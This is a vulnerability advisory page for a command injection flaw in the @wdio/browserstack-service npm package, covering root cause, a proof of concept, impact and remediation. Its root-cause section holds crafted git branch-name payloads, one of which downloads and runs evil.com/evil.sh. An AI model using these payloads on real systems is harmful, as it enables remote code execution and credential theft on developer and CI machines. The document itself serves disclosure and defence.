Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/webdriverio/webdriverio).
CVSS VectorVendor: https://github.com/webdriverio/webdriverio
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Summary
A command injection vulnerability exists in @wdio/browserstack-service that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.
Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._
Vulnerable Code
File: https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204
Root Cause
User-controlled git branch names are directly interpolated into execSync() calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection. Git allows to create these branches.
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}>/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED"Attack Vector
- Attacker creates a malicious git repository with a branch name containing command injection payload
- Attacker configures WebdriverIO to use this repository via
testOrchestrationOptions.runSmartSelection.source. ifsourceis not provided it takes current directory assource. - When
getGitMetadataForAISelection()executes, it extracts the malicious branch name - Branch name is interpolated into shell commands without sanitization
- Shell interprets special characters and executes attacker's commands
PoC
Step 1: Create Malicious Repository Branch
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"Step 2: Configure WebdriverIO
// wdio.conf.js
export const config = {
services: [
['browserstack', {
user: process.env.BROWSERSTACK_USERNAME,
key: process.env.BROWSERSTACK_ACCESS_KEY,
testOrchestrationOptions: {
runSmartSelection: {
enabled: true,
source: ['/tmp/malicious-repo'] // ⚠️ Points to malicious repo, without "source" field, it runs in the current directory.
}
}
}]
],
// ... rest of config
}Step 3: Run Tests
npm run wdioStep 4: Verify RCE
# Check if file was created (proof of RCE)
ls -la /tmp/pwned.txtImpact
- Remote Code Execution on CI/CD servers or developer machines
- Information Disclosure (environment variables, secrets, credentials)
- Data Exfiltration (source code, SSH keys, configuration files)
- System Compromise (backdoor installation, lateral movement)
- Supply Chain Attack (modify build artifacts)
AnalysisAI
Command injection in @wdio/browserstack-service allows arbitrary code execution when malicious git branch names are processed during test orchestration. Attackers can craft repository branch names containing shell metacharacters that execute when the BrowserStack service's getGitMetadataForAISelection() function unsafely passes branch names to Node.js execSync() calls. Exploitation requires configuring WebdriverIO to point at an attacker-controlled repository or cloning into a directory where tests run, making this primarily a supply chain and CI/CD pipeline risk. Publicly available exploit code exists with working proof-of-concept demonstrating file creation via injected commands. Vendor-released patch available in version 9.24.0 per GitHub advisory GHSA-5c46-x3qw-q7j7. CVSS 9.8 (Critical) reflects maximum impact, but real-world exploitation requires either social engineering developers to use malicious repos or compromising upstream dependencies - exploitation probability depends heavily on organizational code review and repository vetting practices.
Technical ContextAI
The vulnerability exists in the WebdriverIO BrowserStack service NPM package (@wdio/browserstack-service), specifically in the test orchestration helpers module at helpers.ts line 204. WebdriverIO is a popular browser automation framework for Node.js that integrates with BrowserStack cloud testing services. The vulnerable code implements an AI-driven smart test selection feature (runSmartSelection) that extracts git metadata to optimize which tests to run. The root cause is CWE-78 (OS Command Injection): the getGitMetadataForAISelection() function calls Node.js child_process.execSync() with string interpolation of unsanitized git branch names directly into shell commands. Git permits branch names to contain special shell metacharacters including semicolons, backticks, dollar signs, and variable expansion syntax like ${IFS} (Internal Field Separator used to bypass space restrictions in injection payloads). When execSync processes these crafted branch names, the shell interprets the metacharacters as command separators or substitutions, executing attacker-controlled commands in the context of the Node.js process. The CPE identifier pkg:npm/@wdio_browserstack-service confirms all versions through 9.23.2 are vulnerable. This reflects a common anti-pattern in Node.js applications where developers assume git metadata is trusted input, failing to apply input validation before shell invocation.
RemediationAI
Upgrade @wdio/browserstack-service to version 9.24.0 or later immediately, as confirmed by the vendor release at https://github.com/webdriverio/webdriverio/releases/tag/v9.24.0 and security advisory https://github.com/webdriverio/webdriverio/security/advisories/GHSA-5c46-x3qw-q7j7. Update package dependencies using 'npm update @wdio/browserstack-service@latest' or modify package.json to specify version constraint '>=9.24.0' and run 'npm install'. For organizations unable to immediately patch, implement the following compensating controls with awareness of their limitations: disable the vulnerable feature by removing or setting testOrchestrationOptions.runSmartSelection.enabled to false in wdio.conf.js, which eliminates AI-driven test selection benefits but prevents exploitation; implement strict git repository allowlisting in CI/CD configurations to prevent tests from running against unapproved repositories, though this requires comprehensive inventory of legitimate test sources; apply mandatory code review for any wdio.conf.js changes that modify testOrchestrationOptions.runSmartSelection.source paths, recognizing that determined attackers may still bypass review through compromised dependencies; restrict CI/CD pipeline permissions to prevent arbitrary repository cloning, though this may break legitimate workflows requiring dynamic repository access. None of these workarounds fully mitigate the vulnerability - upgrading to 9.24.0 is the only complete remediation. Organizations should audit CI/CD logs for suspicious git branch names containing shell metacharacters (semicolons, backticks, ${IFS}, curl commands) as potential indicators of exploitation attempts.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30805
GHSA-5c46-x3qw-q7j7